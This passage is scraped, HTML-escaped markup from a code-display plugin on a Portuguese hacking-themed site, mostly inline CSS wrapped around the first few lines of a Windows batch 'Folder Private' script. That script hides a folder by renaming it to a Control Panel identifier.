!important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&amp;lt;/em&amp;gt;&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;02.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;cls&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;03.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;@ECHO OFF&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;04.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;title Folder Private&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;05.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;06.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;if NOT EXIST Private goto MDLOCKER&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;07.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial 